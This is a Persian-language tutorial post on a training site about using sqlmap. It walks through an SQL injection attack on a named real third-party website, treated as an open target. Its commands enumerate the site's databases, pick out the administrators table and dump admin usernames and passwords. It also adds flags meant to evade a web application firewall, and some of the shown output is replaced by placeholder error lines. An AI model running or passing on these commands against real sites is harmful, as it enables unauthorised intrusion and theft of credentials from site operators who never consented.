درخواست های ارتباط
جستجو
لیست دوستان من
صندوق پیام
همه را دیدم
  • در حال دریافت لیست پیام ها
صندوق پیام
رویدادها
همه را دیدم
  • در حال دریافت لیست رویدادها
همه رویدادهای من
دوره های مرتبط
دوره های توسینسو
دوره آموزشی فوق تخصصی Shell Scripting در BASH Shell
مدرس: محمد عابدینی
این دوره را در 19 قسط خریداری کنید
دوره آموزشی کنترل پنل هاستینگ CWP
مدرس: فربد رستم صولت
این دوره را در 6 قسط خریداری کنید
گام به گام تخصصی مدیریت و پیکربندی سرورها با Ansible در لینوکس
مدرس: مجتبی اسمائی
این دوره را در 10 قسط خریداری کنید
دوره آموزشی بین المللی لینوکس LPIC1 کد 101
مدرس: محمد نصیری
این دوره را در 18 قسط خریداری کنید
دوره آموزشی راه اندازی سرویس های تحت شبکه در لینوکس CentOS
مدرس: آرش حیدری
این دوره را در 12 قسط خریداری کنید
دوره آموزشی رایگان نصب انواع لینوکس بصورت عادی و Dual Boot
مدرس: محمد عابدینی
این دوره را در 4 قسط خریداری کنید
دوره آموزشی جامع CentOS Web Panel یا CWP
مدرس: کاظم تقندیکی
این دوره را در 10 قسط خریداری کنید
دوره آموزشی بین المللی لینوکس LPIC1 کد 102
مدرس: محمد نصیری
این دوره را در 16 قسط خریداری کنید
دوره آموزشی بین المللی لینوکس LPIC2 کد 202
مدرس: امیرحسین احمدی
این دوره را در 29 قسط خریداری کنید
دوره اموزشي فوق تخصصي سيستم عامل لينوكس RHCSA قسمت اول
مدرس: علیرضا سیفی و هومن برازنده
این دوره را در 10 قسط خریداری کنید
دوره آموزشی بین المللی لینوکس LPIC2 کد 201
مدرس: محمد نصیری
این دوره را در 27 قسط خریداری کنید
آموزش نصب سیستم عامل اندروید روی کامپیوترهای شخصی با Android PC
مدرس: محمد عابدینی
این دوره را در 1 قسط خریداری کنید
دوره آموزشی Linux Essentials = دریچه ورود شما به دنیای لینوکس
مدرس: محمد نصیری
این دوره را در 17 قسط خریداری کنید
دوره آموزشی راه اندازی ایمیل سرور iRedMail در OpenBSD
مدرس: محمد عابدینی
این دوره را در 2 قسط خریداری کنید
دوره آموزشی مقدماتی BASH Scripting در لینوکس
مدرس: مجتبی اسمائی
این دوره را در 10 قسط خریداری کنید
0 نظرات
99 بازدیدها
آموزش کار با sqlmap


خب اول از همه‌ باید گفت که این برنامه در

سیستم عامل لینوکس قرار دارد❗️❗️

💢خب بریم سراغ آموزش💢

اول Terminal رو باز میکنیم

بعد در آن تایپ میکنیم sqlmap

برنامه بالا میاد و میبنید که به صورت کامندی

هستش❗️(متنی)

خب ما یه تارگت داریم اول یه نکته درباره ی

این تارگت بگم ...

این تارگت پابلیک شده ...و چون صفحه که

صفحه ادمین رو کسی نتونسته پیدا کنه

همینجوری مونده📌

Target: http://www.bible-history.com/subcat.php?id=2

حالا باید دستور رو وارد کنیم.❗️توجه کنید❗️

اول باید بنویسیم:

sqlmap -u http://www.bible-history.com/subcat.php?id=2 --dbs

در بالا -u به معنای url و --dbs به

معنای دسترسی به دیتابیس هستش

خب چیزهای پیچیده تر هم هست مثلا:

sqlmap -u http://www.bible
-history.com/subcat.php?id=2 —level 5 —risk 3 -v 3 —thread 10 —dbms=mysql —identify-waf —tamper between.py —random-agent —dbs —batch



حالا چند تا کلمه مثلا :
*] bible_glossary
[*] bible_history
[*] information_schema
[*] keywords
[*] kidsdict

اینجا باید چیزهایی که به ادمین مربوط میشه

رو انتخاب کرد (bible_history)

خب نحوه وارد کردن دستورش چجوریه

sqlmap -u http://www.bible-history.com/subcat.php?id=2 -D
bible_history --tables

حالا وقتی این دستور رو زدید یه سری چیزا

مثل:
Emails
administrators
| bh_addform
..........

خب قطعا معلومه که باید کدوم رو انتخاب

کنیم(administrators)

خب حالا دستور بعدی چیه؟☹️

sqlmap -u http://www.bible-history.com/subcat.php?id=2 -D
bible_history -T administrators --columns

و اینجا چیزهایی مثل :

+------------------+-------------+
متن دارای اشکال می باشد
+------------------+-------------+
متن دارای اشکال می باشد
متن دارای اشکال می باشد
متن دارای اشکال می باشد
متن دارای اشکال می باشد
متن دارای اشکال می باشد
+------------------+-------------+

میاره حالا شما دستور
sqlmap -u http://www.bible-history.com/subcat.php?id=2 -D
biblehistory -T administrators -C adminusername,admin_password --dump

خب حالا میبینید که user و password

سایت رو بهتون نشون میده
برچسب ها
مطالب مرتبط

در حال دریافت اطلاعات

نظرات
هیچ نظری ارسال نشده است

    برای ارسال نظر ابتدا به سایت وارد شوید

    arrow